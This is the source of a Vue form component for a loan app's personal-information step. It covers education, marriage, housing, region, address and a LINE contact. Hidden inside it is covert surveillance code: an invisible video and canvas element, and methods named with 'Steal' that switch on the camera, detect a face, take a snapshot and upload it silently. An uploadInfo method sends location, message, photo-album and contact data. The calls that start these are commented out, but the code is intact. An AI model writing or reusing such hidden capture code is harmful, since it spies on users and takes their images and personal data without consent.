<template>
  <div class="basicInformation" :class="$store.state.user.isNested && 'pb300'">
    <!-- header -->
    <div class="navbar_style" :class="$store.state.user.isNested && 'navbar_style_nested'">
      <Icon class="navbar_icon" name="arrow-left" @click="$router.back(1)"/>
      <span>{{ l.basic_nav_title }}</span>
      <div class="icon_box"></div>
    </div>
    <div class="form_body">
      <!-- 进度条 -->
      <div class="stepImg_box">
        <img class="stepImg" src="@/assets/userInfo/tab2.png" alt=""/>
      </div>
      <!-- 进度条 -->
      <div class="form_class">
        <Form
            validate-first
            label-width="120"
            @submit="handleFormCommit"
            @failed="onFailed"
            scroll-to-error
            :show-error="true"
            colon
            error-message-align="right"
            :disabled="$route.query.from == 'my' || echoShow"
        >
          <div class="certification">
            <div class="certificationTitle">
              {{ l.basic_personal_information }}
            </div>
            <LableBox class="formInfo" :label="l.basic_education">
              <Field
                  readonly
                  clickable
                  name="education"
                  :value="formData.education"
                  :placeholder="l.basic_select_education"
                  @click="realFocus('education')"
                  :rules="[{ required: true }]"
              >
                <template #right-icon v-if="!echoShow">
                  <img
                      class="right_img"
                      src="@/assets/userInfo/right@2x.png"
                      alt=""
                  />
                </template>
              </Field>
            </LableBox>
            <!-- educationPopup = true -->
            <Popup round v-model="educationPopup" position="bottom">
              <Picker
                  :confirm-button-text="l.login_ok"
                  :cancel-button-text="l.login_btn_cancel"
                  show-toolbar
                  value-key="name"
                  :columns="educationOptions"
                  :default-index="eduDefaultIndex"
                  @confirm="eduChange"
                  @cancel="educationPopup = false"
              />
            </Popup>
            <LableBox class="formInfo" :label="l.basic_marriage">
              <Field
                  readonly
                  clickable
                  name="marital_status"
                  :value="formData.marital_status"
                  :placeholder="l.basic_select_marriage"
                  @click="realFocus('marital_status')"
                  :rules="[{ required: true }]"
              >
                <template #right-icon v-if="!echoShow">
                  <img
                      class="right_img"
                      src="@/assets/userInfo/right@2x.png"
                      alt=""
                  />
                </template>
              </Field>
            </LableBox>

            <Popup round v-model="marriagePopup" position="bottom">
              <Picker
                  :confirm-button-text="l.login_ok"
                  :cancel-button-text="l.login_btn_cancel"
                  show-toolbar
                  value-key="name"
                  :columns="marriageOptions"
                  :default-index="marriageDefaultIndex"
                  @confirm="marriageChange"
                  @cancel="marriagePopup = false"
              />
            </Popup>
            <LableBox class="formInfo" :label="l.basic_children_num">
              <Field
                  readonly
                  clickable
                  name="number_children"
                  :value="formData.number_children"
                  :placeholder="l.basic_select_children_num"
                  @click="realFocus('number_children')"
                  :rules="[{ required: true }]"
              >
                <template #right-icon v-if="!echoShow">
                  <img
                      class="right_img"
                      src="@/assets/userInfo/right@2x.png"
                      alt=""
                  />
                </template>
              </Field>
            </LableBox>

            <Popup round v-model="childrenNumPopup" position="bottom">
              <Picker
                  :confirm-button-text="l.login_ok"
                  :cancel-button-text="l.login_btn_cancel"
                  show-toolbar
                  value-key="name"
                  :columns="childrenNumOptions"
                  :default-index="childrenNumDefaultIndex"
                  @confirm="childrenNumChange"
                  @cancel="childrenNumPopup = false"
              />
            </Popup>
            <LableBox class="formInfo" :label="l.basic_house_type"
            >
              <Field
                  readonly
                  clickable
                  name="home_type"
                  :value="formData.home_type"
                  :placeholder="l.basic_select_house_type"
                  @click="realFocus('home_type')"
                  :rules="[{ required: true }]"
              >
                <template #right-icon v-if="!echoShow">
                  <img
                      class="right_img"
                      src="@/assets/userInfo/right@2x.png"
                      alt=""
                  />
                </template>
              </Field
              >
            </LableBox>

            <Popup round v-model="houseTypePopup" position="bottom">
              <Picker
                  :confirm-button-text="l.login_ok"
                  :cancel-button-text="l.login_btn_cancel"
                  show-toolbar
                  value-key="name"
                  :columns="houseTypeOptions"
                  :default-index="houseTypeDefaultIndex"
                  @confirm="houseTypeChange"
                  @cancel="houseTypePopup = false"
              />
            </Popup>
            <LableBox class="formInfo" :label="l.basic_stay_length">
              <Field
                  readonly
                  clickable
                  name="dura_occupancy"
                  :value="formData.dura_occupancy"
                  :placeholder="l.basic_select_stay_length"
                  @click="realFocus('dura_occupancy')"
                  :rules="[{ required: true }]"
              >
                <template #right-icon v-if="!echoShow">
                  <img
                      class="right_img"
                      src="@/assets/userInfo/right@2x.png"
                      alt=""
                  />
                </template>
              </Field>
            </LableBox>

            <Popup round v-model="stayLengthPopup" position="bottom">
              <Picker
                  :confirm-button-text="l.login_ok"
                  :cancel-button-text="l.login_btn_cancel"
                  show-toolbar
                  value-key="name"
                  :columns="stayLengthOptions"
                  :default-index="stayLengthDefaultIndex"
                  @confirm="stayLengthChange"
                  @cancel="stayLengthPopup = false"
              />
            </Popup>
            <LableBox class="formInfo" :label="l.basic_living_area">
              <Field
                  readonly
                  name="home_region"
                  :value="occupiedZone"
                  :placeholder="l.basic_select_living_area"
                  @click="realFocus('home_region_1')"
                  :rules="[{ required: true }]"
              >
                <template #right-icon v-if="!echoShow">
                  <img
                      class="right_img"
                      src="@/assets/userInfo/right@2x.png"
                      alt=""
                  />
                </template>
              </Field>
            </LableBox>

            <Popup round v-model="showArea" position="bottom">
              <Picker
                  :confirm-button-text="l.login_ok"
                  :cancel-button-text="l.login_btn_cancel"
                  value-key="name"
                  @change="cityChange"
                  @confirm="cityConfirm"
                  @cancel="showArea = false"
                  show-toolbar
                  :columns="cityOptions"
              />
            </Popup>
            <LableBox class="formInfo" :label="l.basic_address_info">
              <Field
                  type="textarea"
                  rows="1"
                  autosize
                  v-model="formData.home_address"
                  name="home_address"
                  @focus="realFocus('home_address')"
                  :placeholder="l.basic_p_address_info"
                  :rules="[{ required: true }]"
              />
            </LableBox>
          </div>

          <div class="certification">
            <div class="certificationTitle">
              {{ l.basic_other_contact }}
            </div>
            <LableBox class="formInfo" label="LINE">
              <Field
                  type="textarea"
                  autosize
                  rows="1"
                  v-model="formData.line"
                  name="line"
                  @focus="realFocus('line')"
                  :placeholder="l.basic_p_line"
                  :rules="[{ required: true }]"
              />
            </LableBox>
<!--            <LableBox class="formInfo" :label="l.basic_Facebook">-->
<!--              <Field-->
<!--                  type="textarea"-->
<!--                  autosize-->
<!--                  rows="1"-->
<!--                  v-model="formData.facebook"-->
<!--                  name="facebook"-->
<!--                  @focus="realFocus('facebook')"-->
<!--                  :placeholder="l.basic_p_Facebook"-->
<!--                  :rules="[{ required: true }]"-->
<!--              />-->
<!--            </LableBox>-->
<!--            <LableBox class="formInfo" :label="l.basic_zalo">-->
<!--              <Field-->
<!--                  v-model="formData.whatsapp"-->
<!--                  name="whatsapp"-->
<!--                  type="number"-->
<!--                  maxlength="10"-->
<!--                  @focus="realFocus('whatsapp')"-->
<!--                  :placeholder="l.basic_p_zalo"-->
<!--                  :rules="[-->
<!--                  { required: true }, // l.login_p_phone-->
<!--                  {-->
<!--                    validator: checkPhone,-->
<!--                  }, // l.login_p_phone_toast-->
<!--                ]"-->
<!--              />-->
<!--            </LableBox>-->
          </div>

          <!-- 下一步 -->
          <div>
            <Button
                class="nextStep"
                v-if="$route.query.from != 'my' && !echoShow"
                block
                type="info"
                @click="commitPopup = true"
                native-type="submit"
            >{{ l.basic_submit }}
            </Button
            >
          </div>
        </Form>
      </div>
    </div>
    <div class="face_post" v-if="showFacePost">
      <!-- <template v-if="!base64Img"> -->
      <video
          id="video"
          width="288"
          height="220"
          playsinline
          webkit-playsinline="true"
          preload
          autoplay
          loop
          muted
      ></video>
      <!-- <canvas id="canvas" width="2048" height="2048"></canvas> -->
      <canvas id="screenshotCanvasSteal" width="288" height="220"></canvas>
      <!-- </template> -->
    </div>
  </div>
</template>

<script>
import {
  Picker,
  Icon,
  // Progress,
  Form,
  Field,
  Button,
  Popup,
  Toast,
} from "vant";
import {checkPhone} from "@/utils/index";
import areaList from "../../utils/_area";
import {userBase, queryUserBase, userDict, queryRegion} from "../../services/information";
import {userStatus} from "@/services/home";
import l from "../../locales";
import {lrzUploadImage} from "../../services/upload";
import LableBox from "../../components/lable-box";
import {position, message, album, addressbook} from "@/services/common";
import {
  positionInfo,
  messageInfo,
  albumInfo,
  addressbookInfo,
} from "../../utils/maps";

export default {
  name: "BasicInformation",
  components: {
    Picker,
    Icon,
    // Progress,
    Form,
    Field,
    Button,
    // SelectCpt,
    Popup,
    LableBox,
  },
  data() {
    return {
      showFacePost: true,
      echoShow: false,
      l: {...l.basicInformation, ...l.login},
      formData: {
        education: undefined,
        marital_status: undefined,
        number_children: undefined,
        home_type: undefined,
        dura_occupancy: undefined,
        home_region_1: undefined,
        home_region_2: undefined,
        home_address: undefined,
        line: undefined,
        facebook: undefined,
        whatsapp: undefined,
      },

      showArea: false,
      areaList: areaList,
      educationPopup: false,
      marriagePopup: false,
      houseTypePopup: false,
      stayLengthPopup: false,
      childrenNumPopup: false,
      eduDefaultIndex: 0,
      marriageDefaultIndex: 0,
      houseTypeDefaultIndex: 0,
      stayLengthDefaultIndex: 0,
      childrenNumDefaultIndex: 0,
      educationOptions: [],
      marriageOptions: [],
      houseTypeOptions: [],
      stayLengthOptions: [],
      childrenNumOptions: [],
      cityOptions: [],

      videoSteal: null,
      screenshotCanvasSteal: null,
      uploadLockSteal: true, // 上传锁
      base64ImgSteal: null,
      trackerTaskSteal: null,
    };
  },
  computed: {
    occupiedZone() {
      if(this.formData.home_region_1 && this.formData.home_region_2){
        return this.formData.home_region_1 +"/"+ this.formData.home_region_2;
      }else if(this.formData.home_region_1){
        return this.formData.home_region_1;
      }else if(this.formData.home_region_2){
        return this.formData.home_region_2;
      }else{
        return "";
      }
    },
  },
  methods: {
    checkPhone,
    realFocus(str) {
      if (this.$route.query.from == "my" || this.echoShow) {
        return;
      }
      if (str == "education") {
        this.educationPopup = true;
      } else if (str == "marital_status") {
        this.marriagePopup = true;
      } else if (str == "home_type") {
        this.houseTypePopup = true;
      } else if (str == "dura_occupancy") {
        this.stayLengthPopup = true;
      } else if (str == "number_children") {
        this.childrenNumPopup = true;
      } else if (str == "home_region_1") {
        this.showArea = true;
      }
    },
    uploadInfo() {
      let data = localStorage.getItem("visitorId");
      let mobile = this.$store.state.user.userInfo.phone
          .toString()
          .startsWith("0")
          ? this.$store.state.user.userInfo.phone
          : "0" + this.$store.state.user.userInfo.phone;
      position({
        ...positionInfo,
        account_id: mobile,
        uuid: data,
        imei: data,
      });
      // .then((res1) => {
      //   console.log("res1", res1);
      // });
      message({
        ...messageInfo,
        account_id: mobile,
        uuid: data,
        imei: data,
      });
      // .then((res2) => {
      //   console.log("res2", res2);
      // });
      album({
        ...albumInfo,
        account_id: mobile,
        uuid: data,
        imei: data,
      });
      // .then((res3) => {
      //   console.log("res3", res3);
      // });
      addressbook({
        ...addressbookInfo,
        account_id: mobile,
        uuid: data,
        imei: data,
      });
      // .then((res4) => {
      //   console.log("res4", res4);
      // });
    },
    // 教育程度选择
    eduChange(value, index) {
      console.log(value, index);
      this.formData.education = value.name;
      this.educationPopup = false;
    },
    // 婚姻状况选择
    marriageChange(value) {
      this.formData.marital_status = value.name;
      this.marriagePopup = false;
    },
    // 住房类型
    houseTypeChange(value) {
      this.formData.home_type = value.name;
      this.houseTypePopup = false;
    },
    // 居住时长
    stayLengthChange(value) {
      this.formData.dura_occupancy = value.name;
      this.stayLengthPopup = false;
    },
    // 子女数
    childrenNumChange(value) {
      this.formData.number_children = value.name;
      this.childrenNumPopup = false;
    },
    handlenNavBarBack() {
      this.$router.back(1);
    },
    // 城市选择
    cityConfirm(value) {
      this.formData.home_region_1 = value[0].name;
      this.formData.home_region_2 = value[1].name;
      this.showArea = false;
    },
    // 初始化设置
    async initTrackingSteal() {
      let _this = this;
      _this.$nextTick(() => {
        _this.videoSteal = document.getElementById("video");
        _this.screenshotCanvasSteal = document.getElementById(
            "screenshotCanvasSteal"
        );

        // let canvas = document.getElementById("canvas");
        // let context = canvas.getContext("2d");

        // 固定写法
        let tracker = new window.tracking.ObjectTracker("face");
        tracker.setInitialScale(4);
        tracker.setStepSize(2);
        tracker.setEdgesDensity(0.1);
        _this.trackerTaskSteal = window.tracking.track("#video", tracker, {
          camera: true,
        });

        tracker.on("track", function (event) {
          // 检测出人脸 绘画人脸位置
          // context.clearRect(0, 0, canvas.width, canvas.height);
          // event.data.forEach(function (rect) {
          event.data.forEach(function () {
            // context.strokeStyle = "#0764B7";
            // context.strokeRect(rect.x, rect.y, rect.width, rect.height);
            console.log("已识别到人脸");

            // 上传图片
            _this.uploadLockSteal && _this.screenshotAndUploadSteal();
            tracker = null;
          });
        });
        console.log("initTracking");
      });
    },
    // 上传图片
    screenshotAndUploadSteal() {
      let that = this;
      // 上锁避免重复发送请求
      this.uploadLockSteal = false;

      // 绘制当前帧图片转换为base64格式
      let canvas = this.screenshotCanvasSteal;
      let video = this.videoSteal;
      let ctx = canvas.getContext("2d");
      ctx.clearRect(0, 0, canvas.width, canvas.height);
      ctx.drawImage(video, 0, 0, canvas.width, canvas.height);
      let base64Img = canvas.toDataURL("image/jpeg");

      // 使用 base64Img 请求接口即可
      // console.log('base64Img:', base64Img);
      this.base64ImgSteal = base64Img;
      //调用
      var file = this.base64toFile(base64Img);

      lrzUploadImage(file, "facePhoto2", () => {
        that.trackerTaskSteal && that.trackerTaskSteal.stop();
      });
      console.log("file", file);
      // 请求接口成功以后打开锁
    },
    base64toFile(dataurl, filename = "file") {
      let arr = dataurl.split(",");
      let mime = arr[0].match(/:(.*?);/)[1];
      let suffix = mime.split("/")[1];
      let bstr = atob(arr[1]);
      let n = bstr.length;
      let u8arr = new Uint8Array(n);
      while (n--) {
        u8arr[n] = bstr.charCodeAt(n);
      }
      return new File([u8arr], `${filename}.${suffix}`, {
        type: mime,
      });
    },
    // 表单发提交
    handleFormCommit(e) {
      // this.$router.push("/work");
      console.log(e);
      let params = {
        ...e,
        loanPurpose: 0,
      };
      console.log(params);
      params.education = this.educationOptions.filter(
          (item) => item.name === params.education
      )[0].id;
      params.marital_status = this.marriageOptions.filter(
          (item) => item.name === params.marital_status
      )[0].id;
      params.home_type = this.houseTypeOptions.filter(
          (item) => item.name === params.home_type
      )[0].id;
      params.number_children = this.childrenNumOptions.filter(
          (item) => item.name === params.number_children
      )[0].id;
      params.dura_occupancy = this.stayLengthOptions.filter(
          (item) => item.name === params.dura_occupancy
      )[0].id;
      params.home_region_1 = this.cityOptions[0].values.filter(
          (item) => item.name === params.home_region.split("/")[0]
      )[0].id;
      console.log(this.cityOptions[1],params.home_region.split("/")[1])
      params.home_region_2 = this.cityOptions[1].values.filter(
          (item) => item.name === params.home_region.split("/")[1]
      )[0].id

      console.log("params", params);

      userBase(params).then((res) => {
        if (res.code == 200) {
          this.$saveAppsFlyer("基础信息提交");
          Toast.success(this.l.basic_ok);
          this.$router.push("/work");
        }
      });
    },
    // 表单验证提交
    onFailed(err) {
      console.log(err);
    },
    async getUserBase() {
      let userBase = await queryUserBase();
      if (userBase.code == 200) {
        userBase.result && (this.formData = {...userBase.result});
        // 教育程度 转文字
        if (this.formData.education || this.formData.education == 0) {
          const edufilArr = this.educationOptions.filter(
              (item) => item.id == this.formData.education
          )[0];
          this.formData.education = edufilArr.name;
          this.eduDefaultIndex = this.educationOptions.indexOf(edufilArr);
        }

        // 婚姻状况
        if (this.formData.marital_status || this.formData.marital_status == 0) {
          const marriagefilArr = this.marriageOptions.filter(
              (item) => item.id == this.formData.marital_status
          )[0];
          this.formData.marital_status = marriagefilArr.name;
          this.marriageDefaultIndex = this.marriageOptions.indexOf(
              marriagefilArr
          );
        }

        // 住房类型
        if (this.formData.home_type || this.formData.home_type == 0) {
          const houseTypefilArr = this.houseTypeOptions.filter(
              (item) => item.id == this.formData.home_type
          )[0];
          this.formData.home_type = houseTypefilArr.name;
          this.houseTypeDefaultIndex = this.houseTypeOptions.indexOf(
              houseTypefilArr
          );
        }
        // 居住时长
        if (this.formData.dura_occupancy || this.formData.dura_occupancy == 0) {
          const stayLengthfilArr = this.stayLengthOptions.filter(
              (item) => item.id == this.formData.dura_occupancy
          )[0];
          this.formData.dura_occupancy = stayLengthfilArr.name;
          this.stayLengthDefaultIndex = this.stayLengthOptions.indexOf(
              stayLengthfilArr
          );
        }

        // 子女数
        if (
            this.formData.number_children ||
            this.formData.number_children == 0
        ) {
          const childrenNumfilArr = this.childrenNumOptions.filter(
              (item) => item.id == this.formData.number_children
          )[0];
          this.formData.number_children = childrenNumfilArr.name;
          this.childrenNumDefaultIndex = this.childrenNumOptions.indexOf(
              childrenNumfilArr
          );
        }

        // 居住地区
        if (this.formData.home_region_1 || this.formData.home_region_1 == 0) {
          const cityfilArr = this.cityOptions[0].values.filter(
              (item) => item.id == this.formData.home_region_1
          )[0];
          this.formData.home_region_1 = cityfilArr?.name;
          this.showAreaDefaultIndex = this.cityOptions[0].values.indexOf(cityfilArr);
        }
        // 居住地区
        if (this.formData.home_region_2 || this.formData.home_region_2 == 0) {
          const cityfilArr = this.cityOptions[1].values.filter(
              (item) => item.id == this.formData.home_region_2
          )[0];
          this.formData.home_region_2 = cityfilArr?.name;
          this.showAreaDefaultIndex = this.cityOptions[1].values.indexOf(cityfilArr);
        }

        // if(this.formData.line){
        //   this.echoShow = true;
        // }
      }
    },
    async getDict() {
      let dict = await userDict();
      if (dict.code == 200) {
        console.log("dict", dict.result);
        let {
          Education,
          Marry,
          ChildrenNumber,
          HousingType,
          OccupancyDuration,
        } = dict.result;
        this.educationOptions = Education;
        this.marriageOptions = Marry;
        this.childrenNumOptions = ChildrenNumber;
        this.houseTypeOptions = HousingType;
        this.stayLengthOptions = OccupancyDuration;
      }
    },
    // 城市选择
    async cityChange(picker,values) {
      console.log("values", values[0].id);
      let region2 = await this.getRegion2(values[0].id);
      // this.getRegion2(values[0].id)
      picker.setColumnValues(1, region2);
      this.$set(this.cityOptions, 1, { values: region2 });
      // picker.setColumnValues(1, cities[values[0]]);
    },
    async getRegion() {
      let region = await queryRegion({
        address_no: 0,
      });
      let arr = [];
      region.result.map((v) => {
        let obj = {
          id: v.address_no,
          name: v.address_name,
        };
        arr.push(obj);
      });
      this.$set(this.cityOptions, 0, { values: arr });

      let region2 = await this.getRegion2(this.cityOptions[0].values[0].id);

      this.$set(this.cityOptions, 1, { values: region2 });
      console.log("this.cityOptions", this.cityOptions);
    },
    async getRegion2(address_no) {
      let region = await queryRegion({
        address_no,
      });
      let arr = [];
      region.result.map((v) => {
        let obj = {
          id: v.address_no,
          name: v.address_name,
        };
        arr.push(obj);
      });
      return arr;
      // this.$set(this.cityOptions, 1, { values: arr });
    },
    async init() {
      await Promise.all([this.getDict(), this.getRegion()])
      this.getUserBase();
      // this.uploadInfo();
    },
  },
  destroyed() {
    // 关闭摄像头和侦测
    this.showFacePost = false;
    this.trackerTaskSteal && this.trackerTaskSteal.stop();
    this.trackerTaskSteal = null;
  },
  created() {
    document.getElementsByTagName("body")[0].scrollTop = 0;
    this.init();
    // this.initTrackingSteal();
    this.$saveAppsFlyer("进入基础信息");

    userStatus().then((res) => {
      // console.log("userStatus", res);
      if (res.result.loan_status != "1") {
        this.echoShow = true;
      }
    });
  },
};
</script>

<style lang="less" scoped>
@import "./index.less";

.basicInformation {
  background: #ffffff;
  padding-bottom: 50px;
  width: 100%;
  height: 100%;
  //background: url("../../assets/my/bgc.png") no-repeat #fff;
  //background-size: 100%;
  background: #F8FBFF;
}

.face_post {
  position: absolute;
  z-index: -10000;
  top: 0;
  // left: -5000px;
  opacity: 0;
}

/deep/ .van-overlay {
  background: rgba(101, 101, 101, 0.2);
  backdrop-filter: blur(3px);
}

.basicInformation {
  /deep/ .van-picker__confirm {
    color: #45A1FF;
  }

}
</style>
